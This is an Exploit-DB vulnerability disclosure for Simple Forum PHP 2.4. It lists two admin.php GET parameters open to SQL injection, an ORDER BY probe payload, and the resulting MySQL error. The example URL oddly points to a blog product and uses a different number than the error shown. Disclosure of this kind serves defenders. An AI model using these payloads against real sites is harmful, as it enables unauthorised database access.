Simple Forum PHP 2.4 - SQL Injection

EDB-ID:

40531

CVE:

N/A




Platform:

PHP

Date:

2016-10-14


=====================================================
# Simple Forum PHP 2.4 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/forum/admin.php?act=replies&topic_id=[payload]
http://localhost/forum/admin.php?act=editTopic&id=[payload]
Vulnerable parameter : topic_id , id
Mehod : GET

A simple inject :
Payload : '+order+by+100--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+

In response can see result :
Could not execute MySQL query: SELECT * FROM demo_forum_topics WHERE
id='' order by 100-- ' . Error: Unknown column '100' in 'order clause'

Result of payload: Error: Unknown column '100' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================